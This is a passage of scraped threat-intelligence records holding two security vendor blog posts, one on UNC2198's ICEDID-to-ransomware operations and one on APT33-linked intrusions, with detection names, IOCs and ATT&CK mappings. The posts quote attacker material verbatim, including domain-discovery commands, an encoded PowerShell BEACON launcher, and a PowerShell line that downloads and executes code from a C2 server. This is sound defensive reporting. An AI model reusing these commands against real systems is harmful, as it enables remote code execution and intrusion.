<_Redacted_> \nnet groups \"Domain Admins\" /domain \nnet group \"Enterprise admins\" /domain \nnet group \"local admins\" /domain \nnet localgroup \"administrators\" /domain\n\nnltest /domain_trusts \nnltest /dclist:<_Redacted_> \n \n--- \n \n#### Lateral Movement and Privilege Escalation\n\nUNC2198 has used Windows Remote Management and RDP to move laterally between systems. UNC2198 has also performed remote execution of BEACON service binaries on targeted systems to move laterally. UNC2198 launches SMB BEACON using PowerShell, executing command lines such as the following:\n\nC:\\WINDOWS\\system32\\cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALAB \nbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AH \nMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwA3ADIALw...<_Truncated_> \n \n--- \n \nDuring one intrusion, UNC2198 used the SOURBITS privilege escalation utility to execute files on a target system. SOURBITS is a packaged exploit utility for [CVE-2020-0787](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0787>), which is a vulnerability that was disclosed in 2020 for _Windows Background Intelligent Transfer Service (BITS)_. SOURBITS consists of code derived from a [GitHub Repository](<https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION>) that is implemented as a command-line utility, which can execute arbitrary files with elevated privileges. UNC2198 used SOURBITS with the following components:\n\nC:\\Users\\<User>\\Downloads\\runsysO.cr \nC:\\Users\\<User>\\Downloads\\starterO.exe \n--- \n \nThe file _runsysO.cr_ is an XOR-encoded PE executable that exploits CVE-2020-0787, and based on the target system's bitness, it will drop one of two embedded SOURBITS payloads.\n\n_Data Theft, Ransomware Deployment and #TTR_\n\nLike other financially motivated threat actors, part of UNC2198\u2019s modus operandi in latter stages of intrusions involves the exfiltration of hundreds of gigabytes of the victim organizations\u2019 data before ransomware is installed. Specifically, UNC2198 has used _RCLONE, a _command line utility used to synchronize cloud storage, to aid in the exfiltration of sensitive data. In all observed cases of data theft, _RCLONE _was used by UNC2198 from the \u201c_C:\\PerfLogs\\rclone.exe_\u201d file path.\n\n\u201c_Time-to-Ransom_\" (TTR) is the delta between first-attributed _access _time and the time of ransomware deployment. TTR serves as a useful gauge of how quickly an organization needs to respond to stave off a threat actor\u2019s successful deployment of ransomware. TTR is not a perfect quantification, as external factors such as an organization\u2019s security posture can drastically affect the measurement.\n\nIn this post, the TTR of UNC2198 is measured between ICEDID activity to the deployment of ransomware. In July 2020, UNC2198 deployed MAZE ransomware using PSEXEC, and the TTR was 5.5 days. In October 2020, UNC2198 deployed EGREGOR ransomware using forced GPO updates, and the TTR was 1.5 days.\n\n#### Looking Forward\n\nThreat actors leveraging access obtained through mass malware campaigns to deploy ransomware is a growing trend. The efficiency of ransomware groups places a significant burden on defenders to rapidly respond before ransomware deployment. As ransomware groups continue to gain operational expertise through successful compromises, they will continue to shorten their TTR while scaling their operations. Understanding the TTPs fundamental to a specific operation like UNC2198 provides an edge to defenders in their response efforts. Our unparalleled understanding of groups like UNC2198 is translated into Mandiant Advantage. Accessing our holdings in Mandiant Advantage aids defenders in recognizing TTPs used by threat actors, assessing organizational risk, and taking action. Initial investments made into rapidly assessing a group\u2019s modus operandi pays dividends when they inevitably evolve and swap out components of their toolset. Whether it be MAZE or EGREGOR, something icy or hot, Advanced Practices will continue to pursue these unchill threat actors.\n\n#### Acknowledgements\n\nThank you to Dan Perez, Andrew Thompson, Nick Richard, Cian Lynch and Jeremy Kennelly for technical review of this content. In addition, thank you to Mandiant frontline responders for harvesting the valuable intrusion data that enables our research.\n\n#### Appendix: Malware Families\n\n[PHOTOLOADER](<https://advantage.mandiant.com/malware/malware--badb174b-5bbb-51cb-91de-615dd4a54198>) is a downloader that has been observed to download ICEDID. It makes an HTTP request for a fake image file, which is RC4 decrypted to provide the final payload. Host information is sent to the command and control (C2) via HTTP cookies. Samples have been observed to contain an embedded C2 configuration that contain the real C2 with a number of non-malicious domains. The non-malicious domains are contacted in addition to the real C2.\n\n[WINDARC](<https://advantage.mandiant.com/malware/malware--5f584191-7903-55f9-8a3d-c1b4528e18be>) is a backdoor that hijacks the execution of TeamViewer to perform C2 communication. It supports plugins and accepts several backdoor commands. The commands include interacting with the TeamViewer tool, starting a reverse shell, loading new plugins, downloading and executing files, and modifying configuration settings.\n\n[SYSTEMBC](<https://advantage.mandiant.com/malware/malware--17784955-af55-5462-877f-feaba0c8d80a>) is a proxy malware that beacons to its C2 and opens new proxy connections between the C2 and remote hosts as indicated by the C2. Proxied communications are encrypted with RC4. The malware receives commands via HTTP and creates new proxy connections as directed. Underground sales advertisements refer to the software as a \u201c_socks5 backconnect system\u201d_. The malware is typically used to hide the malicious traffic associated with other malware.\n\n#### Appendix: Detecting the Techniques\n\nFireEye security solutions detect these threats across email, endpoint, and network levels. The following is a snapshot of existing detections related to activity outlined in this blog post.\n\n**Platform**\n\n| \n\n**Detection Name** \n \n---|--- \n \nFireEye Network Security\n\n| \n\n * Downloader.Macro.MOUSEISLAND \n * Downloader.Win.PHOTOLOADER \n * Trojan.PHOTOLOADER \n * Downloader.IcedID\n * Trojan.IcedID \n * Malicious.SSL.IcedID\n * Malicious.SSL.IcedIdCert\n * Trojan.Malicious.Certificate\n * Backdoor.BEACON\n * Trojan.Generic\n * Trojan.CobaltStrike \n \nFireEye Endpoint Security\n\n| \n\n**Real-Time (IOC)**\n\n * BLOODHOUND ATTACK PATH MAPPING (UTILITY)\n * BLOODHOUND ATTACK PATH MAPPING A (UTILITY)\n * COBALT STRIKE (BACKDOOR)\n * COBALT STRIKE DEFAULT DLL EXPORT (BACKDOOR)\n * COBALT STRIKE NAMED PIPE ECHO (BACKDOOR)\n * EGREGOR RANSOMWARE (FAMILY)\n * ICEDID (FAMILY)\n * MAZE RANSOMWARE (FAMILY)\n * MAZE RANSOMWARE A (FAMILY)\n * METASPLOIT SERVICE ABUSE (UTILITY)\n * MOUSEISLAND (DOWNLOADER)\n * MOUSEISLAND A (DOWNLOADER)\n * MOUSEISLAND B (DOWNLOADER)\n * POWERSHELL DOWNLOADER (METHODOLOGY)\n * POWERSHELL DOWNLOADER D (METHODOLOGY)\n * SCHTASK CREATION FROM PROGRAMDATA (COLLECTION)\n * SUSPICIOUS BITSADMIN USAGE A (METHODOLOGY)\n * SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\n * WMIC SHADOWCOPY DELETE (METHODOLOGY)\n\n**Malware Protection (AV/MG)**\n\n * SYSTEMBC\n * Trojan.EmotetU.Gen.*\n * Trojan.Mint.Zamg.O\n * Generic.mg.*\n * ICEID\n * Gen:Variant.Razy.*\n * Generic.mg.*\n * BEACON\n * Gen:Trojan.Heur.TP.TGW@bug909di\n * Gen:Variant.Bulz.1217\n * Trojan.GenericKD.34797730\n * Generic.mg.* \n \n#### Appendix: Indicators\n\n95b78f4d3602aeea4f7a33c9f1b49a97\n\n| \n\nSYSTEMBC \n \n---|--- \n \n0378897e4ec1d1ee4637cff110635141\n\n| \n\nSYSTEMBC \n \nc803200ad4b9f91659e58f0617f0dafa\n\n| \n\nSYSTEMBC \n \nad4d445091a3b66af765a1d653fd1eb7\n\n| \n\nSYSTEMBC \n \n9ecf25b1e9be0b20822fe25269fa5d02\n\n| \n\nSYSTEMBC \n \ne319f5a8fe496c0c8247e27c3469b20d\n\n| \n\nSYSTEMBC \n \na8a7059278d82ce55949168fcd1ddde4\n\n| \n\nSYSTEMBC \n \naea530f8a0645419ce0abe1bf2dc1584\n\n| \n\nSYSTEMBC \n \n3098fbc98e90d91805717d7a4f946c27\n\n| \n\nSYSTEMBC \n \n45.141.84.212:4132\n\n| \n\nSYSTEMBC \n \n45.141.84.223:4132\n\n| \n\nSYSTEMBC \n \n79.141.166.158:4124\n\n| \n\nSYSTEMBC \n \n149.28.201.253:4114\n\n| \n\nSYSTEMBC \n \n193.34.167.34:80 \n\n| \n\nBEACON \n \n195.123.240.219:80\n\n| \n\nBEACON \n \n23.227.193.167:80\n\n| \n\nBEACON \n \n5.149.253.199:80 \n\n| \n\nBEACON \n \ne124cd26fcce258addc85d7f010655ea\n\n| \n\nBEACON \n \n7ae990c12bf5228b6d1b90d40ad0a79f\n\n| \n\nBEACON \n \n3eb552ede658ee77ee4631d35eac6b43\n\n| \n\nBEACON \n \nc188c6145202b65a941c41e7ff2c9afd\n\n| \n\nBEACON \n \n2f43055df845742d137a18b347f335a5\n\n| \n\nBEACON \n \n87dc37e0edb39c077c4d4d8f1451402c\n\n| \n\nICEDID \n \n1efababd1d6bd869f005f92799113f42\n\n| \n\nICEDID \n \na64e7dd557e7eab3513c9a5f31003e68\n\n| \n\nICEDID \n \n9760913fb7948f2983831d71a533a650\n\n| \n\nICEDID \n \n14467102f8aa0a0d95d0f3c0ce5f0b59\n\n| \n\nICEDID \n \ncolombosuede.club\n\n| \n\nICEDID \n \ncolosssueded.top\n\n| \n\nICEDID \n \ngolddisco.top\n\n| \n\nICEDID \n \njune85.cyou\n\n| \n\nICEDID \n \n#### Appendix: Mandiant Security Validation Actions\n\nOrganizations can validate their security controls against more than 60 actions with Mandiant Security Validation.\n\n**VID**\n\n| \n\n**Name** \n \n---|--- \n \nA101-509\n\n| \n\nPhishing Email - Malicious Attachment, MOUSEISLAND, Macro Based Downloader \n \nA150-326\n\n| \n\nMalicious File Transfer - MOUSEISLAND, Download, Variant #1 \n \nA150-433\n\n| \n\nMalicious File Transfer - MOUSEISLAND, Download, Variant #2 \n \nA101-282\n\n| \n\nMalicious File Transfer - MOUSEISLAND Downloader, Download \n \nA104-632\n\n| \n\nProtected Theater - MOUSEISLAND Downloader, Execution \n \nA101-266\n\n| \n\nCommand and Control - MOUSEISLAND, HTTP GET Request for PHOTOLOADER \n \nA101-280\n\n| \n\nMalicious File Transfer - PHOTOLOADER, Download \n \nA101-263\n\n| \n\nCommand and Control - PHOTOLOADER, DNS Query #1 \n \nA101-281\n\n| \n\nMalicious File Transfer - ICEDID Stage 3, Download \n \nA101-279\n\n| \n\nMalicious File Transfer - ICEDID Final Payload, Download \n \nA101-265\n\n| \n\nCommand and Control - ICEDID, DNS Query #1 \n \nA101-264\n\n| \n\nCommand and Control - ICEDID, DNS Query #2 \n \nA101-037\n\n| \n\nMalicious File Transfer - MAZE, Download, Variant #1 \n \nA101-038\n\n| \n\nMalicious File Transfer - MAZE, Download, Variant #2 \n \nA101-039\n\n| \n\nMalicious File Transfer - MAZE, Download, Variant #3 \n \nA101-040\n\n| \n\nMalicious File Transfer - MAZE, Download, Variant #4 \n \nA101-041\n\n| \n\nMalicious File Transfer - MAZE, Download, Variant #5 \n \nA101-042\n\n| \n\nMalicious File Transfer - MAZE, Download, Variant #6 \n \nA101-043\n\n| \n\nMalicious File Transfer - MAZE, Download, Variant #7 \n \nA101-044\n\n| \n\nMalicious File Transfer - MAZE, Download, Variant #8 \n \nA101-045\n\n| \n\nMalicious File Transfer - MAZE, Download, Variant #9 \n \nA100-878\n\n| \n\nCommand and Control - MAZE Ransomware, C2 Check-in \n \nA101-030\n\n| \n\nCommand and Control - MAZE Ransomware, C2 Beacon, Variant #1 \n \nA101-031\n\n| \n\nCommand and Control - MAZE Ransomware, C2 Beacon, Variant #2 \n \nA101-032\n\n| \n\nCommand and Control - MAZE Ransomware, C2 Beacon, Variant #3 \n \nA104-734\n\n| \n\nProtected Theater - MAZE, PsExec Execution \n \nA104-487\n\n| \n\nProtected Theater - MAZE Ransomware, Encoded PowerShell Execution \n \nA104-485\n\n| \n\nProtected Theater - MAZE Ransomware Execution, Variant #1 \n \nA104-486\n\n| \n\nProtected Theater - MAZE Ransomware Execution, Variant #2 \n \nA104-491\n\n| \n\nHost CLI - MAZE, Create Target.lnk \n \nA104-494\n\n| \n\nHost CLI - MAZE, Dropping Ransomware Note Burn Directory \n \nA104-495\n\n| \n\nHost CLI - MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant \n \nA104-496\n\n| \n\nHost CLI - MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant \n \nA104-498\n\n| \n\nHost CLI - MAZE, Desktop Wallpaper Ransomware Message \n \nA150-668\n\n| \n\nMalicious File Transfer - EGREGOR, Download \n \nA101-460\n\n| \n\nCommand and Control - EGREGOR, GET DLL Payload \n \nA150-675\n\n| \n\nProtected Theater - EGREGOR, Execution, Variant #1 \n \nA101-271\n\n| \n\nMalicious File Transfer - BEACON, Download, Variant #1 \n \nA150-610\n\n| \n\nMalicious File Transfer - BEACON, Download \n \nA150-609\n\n| \n\nCommand and Control - BEACON, Check-in \n \nA104-732\n\n| \n\nProtected Theater - BEACON, Mixed Unicode-Escaped and ASCII Characters Execution \n \nA101-514\n\n| \n\nMalicious File Transfer - WINDARC, Download, Variant #1 \n \nA100-072\n\n| \n\nMalicious File Transfer - SYSTEMBC Proxy, Download \n \nA100-886\n\n| \n\nMalicious File Transfer - Rclone.exe, Download \n \nA100-880\n\n| \n\nMalicious File Transfer - Bloodhound Ingestor C Sharp Executable Variant, Download \n \nA100-881\n\n| \n\nMalicious File Transfer - Bloodhound Ingestor C Sharp PowerShell Variant, Download \n \nA100-882\n\n| \n\nMalicious File Transfer - Bloodhound Ingestor PowerShell Variant, Download \n \nA100-877\n\n| \n\nActive Directory - BloodHound, CollectionMethod All \n \nA101-513\n\n| \n\nMalicious File Transfer - SOURBITS, Download, Variant #1 \n \nA104-733\n\n| \n\nProtected Theater - CVE-2020-0787, Arbitrary File Move \n \nA100-353\n\n| \n\nCommand and Control - KOADIC Agent (mshta) \n \nA100-355\n\n| \n\nCommand and Control - Multiband Communication using KOADIC \n \nA104-088\n\n| \n\nHost CLI - Timestomp W/ PowerShell \n \nA104-277\n\n| \n\nHost CLI - EICAR COM File Download via PowerShell \n \nA104-281\n\n| \n\nHost CLI - EICAR TXT File Download via PowerShell \n \nA104-664\n\n| \n\nHost CLI - EICAR, Download with PowerShell \n \nA150-054\n\n| \n\nMalicious File Transfer - EMPIRE, Download \n \nA100-327\n\n| \n\nCommand and Control - PowerShell Empire Agent (http) \n \nA100-328\n\n| \n\nLateral Movement, Execution - PsExec \n \nA100-498\n\n| \n\nScanning Activity - TCP Port Scan for Open RDP \n \nA100-502\n\n| \n\nScanning Activity - UDP Port Scan for Open RDP \n \nA100-316\n\n| \n\nLateral Movement - PSSession and WinRM \n \nA104-081\n\n| \n\nHost CLI - Mshta \n \n#### Appendix: UNC2198 MITRE ATT&CK Mapping\n\n**ATT&CK Tactic Category**\n\n| \n\n**Techniques** \n \n---|--- \n \nResource Development\n\n| \n\nAcquire Infrastructure (T1583)\n\n * Virtual Private Server (T1583.003)\n\nDevelop Capabilities (T1587)\n\n * Digital Certificates (T1587.003)\n\nObtain Capabilities (T1588)\n\n * Code Signing Certificates (T1588.003)\n * Digital Certificates (T1588.004) \n \nInitial Access\n\n| \n\nPhishing (T1566)\n\n * Spearphishing Attachment (T1566.001)\n\nExternal Remote Services (T1133)\n\nValid Accounts (T1078) \n \nExecution\n\n| \n\nCommand and Scripting Interpreter (T1059)\n\n * PowerShell (T1059.001)\n * Visual Basic (T1059.005)\n * Windows Command Shell (T1059.003)\n\nScheduled Task/Job (T1053)\n\n * Scheduled Task (T1053.005)\n\nSystem Services (T1569)\n\n * Service Execution (T1569.002)\n\nUser Execution (T1204)\n\n * Malicious File (T1204.002)\n\nWindows Management Instrumentation (T1047) \n \nPersistence\n\n| \n\nExternal Remote Services (T1133)\n\nScheduled Task/Job (T1053)\n\n * Scheduled Task (T1053.005)\n\nValid Accounts (T1078) \n \nPrivilege Escalation\n\n| \n\nProcess Injection (T1055)\n\nScheduled Task/Job (T1053)\n\n * Scheduled Task (T1053.005)\n\nValid Accounts (T1078) \n \nDefense Evasion\n\n| \n\nImpair Defenses (T1562)\n\n * Disable or Modify System Firewall (T1562.004)\n * Disable or Modify Tools (T1562.001)\n\nIndicator Removal on Host (T1070)\n\n * Timestomp (T1070.006)\n\nIndirect Command Execution (T1202)\n\nModify Registry (T1112)\n\nObfuscated Files or Information (T1027)\n\n * Steganography (T1027.003)\n\nProcess Injection (T1055)\n\nSigned Binary Proxy Execution (T1218)\n\n * Mshta (T1218.005)\n\nSubvert Trust Controls (T1553)\n\n * Code Signing (T1553.002)\n\nValid Accounts (T1078)\n\nVirtualization/Sandbox Evasion (T1497) \n \nCredential Access\n\n| OS Credential Dumping (T1003) \n \nDiscovery\n\n| \n\nAccount Discovery (T1087)\n\n * Local Account (T1087.001)\n\nDomain Trust Discovery (T1482)\n\nFile and Directory Discovery (T1083)\n\nPermission Groups Discovery (T1069)\n\nSystem Information Discovery (T1082)\n\nSystem Network Configuration Discovery (T1016)\n\nSystem Owner/User Discovery (T1033)\n\nVirtualization/Sandbox Evasion (T1497) \n \nLateral Movement\n\n| \n\nRemote Services (T1021)\n\n * Remote Desktop Protocol (T1021.001)\n * SMB/Windows Admin Shares (T1021.002)\n * SSH (T1021.004) \n \nCollection\n\n| \n\nArchive Collected Data (T1560)\n\n * Archive via Utility (T1560.001) \n \nCommand and Control\n\n| \n\nApplication Layer Protocol (T1071)\n\n * Web Protocols (T1071.001)\n\nEncrypted Channel (T1573)\n\n * Asymmetric Cryptography (T1573.002)\n\nIngress Tool Transfer (T1105)\n\nProxy (T1090)\n\n * Multi-hop Proxy (T1090.003)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T00:00:00", "type": "fireeye", "title": "So Unchill: Melting UNC2198 ICEDID to Ransomware Operations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2021-02-25T00:00:00", "id": "FIREEYE:83F272F4DE8F766E35BD5943AAC47D20", "href": "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-01-27T23:01:52", "description": "#### Introduction\n\nFireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's [Managed Defense](<https://www.fireeye.com/solutions/managed-defense.html>) has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.\n\nOn Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity [targeting Energy and Aerospace industries](<https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html>). Recent public reporting indicated possible links between the confirmed APT33 spear phishing and [destructive SHAMOON attacks](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/>); however, we were unable to independently verify this claim. FireEye\u2019s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.\n\n> 45 days ago, during 24x7 monitoring, [#ManagedDefense](<https://twitter.com/hashtag/ManagedDefense?src=hash&ref_src=twsrc%5Etfw>) detected & contained an attempted intrusion from newly-identified adversary infrastructure*. \n \nIt is C2 for a code family we track as POWERTON. \n \n*hxxps://103.236.149[.]100/api/info\n> \n> \u2014 FireEye (@FireEye) [December 15, 2018](<https://twitter.com/FireEye/status/1073744224510722048?ref_src=twsrc%5Etfw>)\n\n#### Identifying the Overlap in Threat Activity\n\nFireEye augments our expertise with an [internally-developed similarity engine](<https://www.camlis.org/matthew-berninger/>) to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection during specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is [available within our intelligence portal](<https://intelligence.fireeye.com/reports/18-00021316>). To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24x7 monitoring.\n\n#### Managed Defense Rapid Responses: Investigating the Attacker\n\nIn mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost\u2019s [RULER](<https://github.com/sensepost/ruler>), to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\\outlook\\live.exe (MD5: _95f3bea43338addc1ad951cd2d42eb6f_).\n\nThe payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system\u2019s architecture, downloaded the appropriate variant of PowerSploit (MD5: _c326f156657d1c41a9c387415bf779d4_ or _0564706ec38d15e981f71eaf474d0ab8_), and reflectively loaded PUPYRAT (MD5: _94cd86a0a4d747472c2b3f1bc3279d77_ or _17587668AC577FCE0B278420B8EB72AC_). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.\n\nFireEye collected 168 PUPYRAT samples for a comparison. While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor\u2019s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.\n\nIn mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER\u2019s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users\u2019 Outlook client homepages for code execution and persistence. These methods are further explored in this post in the \"RULER In-The-Wild\" section.\n\nThe actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.\n\nDuring the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. One example is shown in Figure 1.\n\n \nFigure 1: Attacker\u2019s homepage exploit (CVE-2017-11774)\n\nThe main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named \u201cMedia.ps1\u201d within the user\u2019s %LOCALAPPDATA% directory (%LOCALAPPDATA%\\MediaWs\\Media.ps1) as shown in Figure 2.\n\n \nFigure 2: Attacker\u2019s \u201cMedia.ps1\u201d script\n\nThe purpose of \u201cMedia.ps1\u201d was to decode and execute the downloaded binary payload, which was written to disk as \u201cC:\\Users\\Public\\Downloads\\log.dat\u201d. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.\n\nAnalysis of the \u201clog.dat\u201d payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:\n\n * Username and domain\n * Computer name\n * CPU details\n * Current exe PID\n * Configured C2 server\n\nThe C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned \u201cMedia.ps1\u201d PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.\n\nPOSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info)_. _The adversary had limited success with interacting with POWERTON during this time. The actor was able to download and establish persistence for an AutoIt binary named \u201cClouldPackage.exe\u201d (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON \u201cpersist\u201d command. The sole functionality of \u201cClouldPackage.exe\u201d was to execute the following line of PowerShell code:\n\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')\n\nThe purpose of this code is to retrieve \u201csilent mode\u201d POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.\n\nStarting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of \u201cindex.html\u201d were identified during this period. Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.\n\n \nFigure 3: OS-specific POSHC2 Downloader\n\nFigure 3 shows that the actor made some minor changes, such as encoding the PowerShell \"DownloadString\" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to \u201cVision.ps1\u201d. During this August 2018 activity, the POSHC2 variants were configured with a \u201ckill date\u201d of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to guardrail an intrusion by time and this functionality is built into the framework.****\n\nOnce again, POSHC2 was used to download a new variant of POWERTON (MD5: _c38069d0bc79acdc28af3820c1123e53_), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.****\n\nDue to Managed Defense\u2019s early containment of these intrusions, we were unable to ascertain the actor\u2019s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim\u2019s network.****\n\n#### Adversary Pursuit: Infrastructure Monitoring\n\nAdvanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed the payload (MD5: _8be06571e915ae3f76901d52068e3498_) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info_ _(MD5: _4047e238bbcec147f8b97d849ef40ce5_). This specific URL was identified in a [public discussion](<https://twitter.com/KseProso/status/1073169197541281792>) as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.\n\nOn Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: _f0fe6e9dde998907af76d91ba8f68a05_). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: _53ae59ed03fa5df3bf738bc0775a91d9_).\n\nTable 1 contains the operational timeline for the activity we analyzed.****\n\n**DATE/TIME (UTC)**\n\n| \n\n**NOTE**\n\n| \n\n**INDICATOR** \n \n---|---|--- \n \n2017-08-15 17:06:59\n\n| \n\nAPT33 \u2013 EMPIRE (Used)\n\n| \n\n8a99624d224ab3378598b9895660c890 \n \n2017-09-15 16:49:59\n\n| \n\nAPT33 \u2013 PUPYRAT (Compiled)\n\n| \n\n4b19bccc25750f49c2c1bb462509f84e \n \n2017-11-12 20:42:43\n\n| \n\nGroupA \u2013 AUT2EXE Downloader (Compiled)\n\n| \n\n95f3bea43338addc1ad951cd2d42eb6f \n \n2017-11-14 14:55:14\n\n| \n\nGroupA \u2013 PUPYRAT (Used)\n\n| \n\n17587668ac577fce0b278420b8eb72ac \n \n2018-01-09 19:15:16\n\n| \n\nAPT33 \u2013 PUPYRAT (Compiled)\n\n| \n\n56f5891f065494fdbb2693cfc9bce9ae \n \n2018-02-13 13:35:06\n\n| \n\nAPT33 \u2013 PUPYRAT (Used)\n\n| \n\n56f5891f065494fdbb2693cfc9bce9ae \n \n2018-05-09 18:28:43\n\n| \n\nGroupB 